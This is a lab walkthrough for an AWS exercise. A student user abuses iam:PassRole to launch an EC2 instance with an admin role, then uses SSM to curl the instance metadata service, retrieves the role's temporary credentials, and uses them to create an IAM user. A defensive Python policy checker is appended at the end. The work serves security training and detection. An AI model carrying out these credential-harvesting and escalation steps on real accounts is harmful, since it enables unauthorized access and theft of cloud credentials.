Lab Walkthrough - Pass Role: EC2
In this lab walkthrough, we show how overly permissive IAM permissions around AWS EC2 can be abused by a user to perform privileged operations.
As the AWS documentation reads:
To pass a role (and its permissions) to an AWS service, a user must have permissions to pass the role to the service. This helps administrators ensure that only approved users can configure a service with a role that grants permissions.
However, overly permissive permissions can be abused by a user to perform privileged operations.
Before getting started, let’s look at a few basic things:
EC2 or ec2: Elastic Compute Cloud (EC2) is a web service offered by Amazon that allows you to provision virtual machines in the cloud. These virtual machines are also referred to as EC2 instances.
VPC: A Virtual Private Cloud (VPC) refers to a logically isolated section within a public cloud, therefore providing a private cloud computing environment.
Subnet: A subnet or subnetwork refers to a range of IP addresses in the virtual private cloud.
Security group: A security group associated with a resource (say an EC2 instance) can be thought of as a virtual firewall that controls the traffic that can reach and leave the resource.
AMI: An Amazon Machine Image (AMI) is like a software configuration template that provides the information needed to create an instance within the Amazon Elastic Compute Cloud.
SSM: AWS Systems Manager, formerly known as SSM (Simple Systems Manager), is a management tool that provides operational insights and control of infrastructure on AWS. It can also be used to remotely run commands on an EC2 instance.
Challenge Statement
The objective is to leverage the policy attached to the student user and attain administrative privileges on the AWS account.
Solution
Step 1: Configure AWS CLI to use the provided credentials.
Command:
aws configure
Step 2: List the policies attached to the user. Also, list inline policies attached to the user.
Commands:
aws iam list-attached-user-policies --user-name student
aws iam list-user-policies --user-name student
Step 3: Try creating a user on the AWS account.
Command:
aws iam create-user --user-name Bob
User creation failed due to insufficient privileges.
Step 4: Check the policy permissions and details.
Command:
aws iam get-user-policy --user-name student --policy-name ConfigureEC2Role
The student user can run EC2 instances and pass a role to the EC2 instance. Since the student user also has permission to interact with the SSM service, the student user can execute commands on the EC2 instances via SSM.
Step 5: List roles on the AWS account which can be passed to the EC2 service.
Command:
aws iam list-roles
Step 6: Check ec2admin role policies and permissions.
Command:
aws iam list-role-policies --role-name ec2admin
Step 7: Check policy permissions.
Command:
aws iam get-role-policy --role-name ec2admin --policy-name terraform-20210212121709495300000001
The ec2admin role allows Administrator access on the AWS account.
An EC2 instance must be launched inside a subnet, which in turn sits inside a VPC, and it must have a security group attached. The next few steps collect the required information.
Step 8: Since an EC2 instance is created out of an AMI, we need to find an image. Amazon Linux 2 AMIs are the latest images provided by AWS for the Linux operating system. Let’s find the AMI id for Amazon Linux 2 AMI.
Command:
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --output json
The AMI id is ami-0d08a21fc010da680
Step 9: Check the subnets available in the AWS account:
Command:
aws ec2 describe-subnets
Make a note of subnet id.
Step 10: Check security groups for ec2 service.
Command:
aws ec2 describe-security-groups
Make a note of the security group id.
Step 11: List instance profiles for the AWS account.
Command:
aws iam list-instance-profiles
Make a note of the ec2 instance profile name.
Step 12: Now you can start an ec2 instance using all the collected details.
Command:
aws ec2 run-instances --subnet-id subnet-0dfbb465103aa1c2d --image-id ami-0d08a21fc010da680 --iam-instance-profile Name=ec2_admin --instance-type t2.micro --security-group-ids "sg-0106a4a8e91b3a682"
Make a note of the instance id.
Step 13: Run commands on the remote ec2 instance using SSM.
Command:
aws ssm send-command \
    --document-name "AWS-RunShellScript" \
    --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2admin/"]' \
    --targets "Key=instanceids,Values=i-0da83d9b4322af4fa" \
    --comment "aws cli 1"
Make a note of the command id. The executed command will interact with the metadata service and print out the temporary access credentials of the role associated with the EC2 instance.
Step 14: Get the command’s output using SSM.
Command:
aws ssm get-command-invocation \
    --command-id "0765bff4-4966-446f-a0a2-4e0cdfee565f" \
    --instance-id "i-0da83d9b4322af4fa"
Command execution is successful. Make a note of Access keys and session tokens.
Step 15: Note down access keys from the command output and assume the ec2admin role by exporting access key id, secret access key, and session token as environment variables.
Commands:
export AWS_ACCESS_KEY_ID=<access key id>
export AWS_SECRET_ACCESS_KEY=<secret access key>
export AWS_SESSION_TOKEN=<session token>
Step 16: Check caller identity to confirm whether assuming role was successful.
Command:
aws sts get-caller-identity
Role assumed successfully.
Step 17: Try creating a new user on the AWS account to verify Administrative privileges.
Command:
aws iam create-user --user-name Bob
Successfully performed a privileged operation.
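A defender-side check for the permission combination this walkthrough relies on, as an added example that is not part of the original lab: it flags an identity policy that allows iam:PassRole on a wildcard Resource together with ec2:RunInstances and ssm:SendCommand. Both policy documents are constructed (the lab's ConfigureEC2Role JSON is not shown on the page), the account id and role name are hypothetical, and the check only reads Allow/Action/Resource; it does not evaluate Deny, NotAction, conditions, or permission boundaries.

```python
import fnmatch

# Constructed policies. WEAK_POLICY is modelled on the walkthrough's description
# of ConfigureEC2Role (its JSON is not shown on the page); the account id and
# role name in HARDENED_POLICY are hypothetical.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:PassRole", "ec2:RunInstances"], "Resource": "*"},
        {"Effect": "Allow", "Action": "ssm:*", "Resource": "*"},
    ],
}
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "ec2:RunInstances", "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::111122223333:role/app-readonly",
         "Condition": {"StringEquals": {"iam:PassedToService": "ec2.amazonaws.com"}}},
    ],
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _grants(stmt, action):
    """True if an Allow statement's Action patterns cover `action`."""
    if stmt.get("Effect") != "Allow" or "Action" not in stmt:
        return False
    # IAM action matching is case-insensitive and supports * and ? wildcards.
    return any(fnmatch.fnmatchcase(action.lower(), p.lower())
               for p in _as_list(stmt["Action"]))


def audit(policy):
    """Return finding ids for the PassRole-to-EC2 escalation pattern."""
    stmts = _as_list(policy.get("Statement", []))
    def any_role(s):
        return any("*" in r for r in _as_list(s.get("Resource", [])))
    if not any(_grants(s, "iam:PassRole") and any_role(s) for s in stmts):
        return []
    findings = ["PASSROLE_WILDCARD_RESOURCE"]
    if any(_grants(s, "ec2:RunInstances") for s in stmts):
        findings.append("CAN_LAUNCH_INSTANCE_WITH_ANY_ROLE")
        if any(_grants(s, "ssm:SendCommand") for s in stmts):
            findings.append("CAN_RUN_COMMANDS_AS_INSTANCE_ROLE")
    return findings
```

Scoping iam:PassRole to specific role ARNs is what removes the finding; the iam:PassedToService condition alone limits the receiving service, not which role can be handed to it.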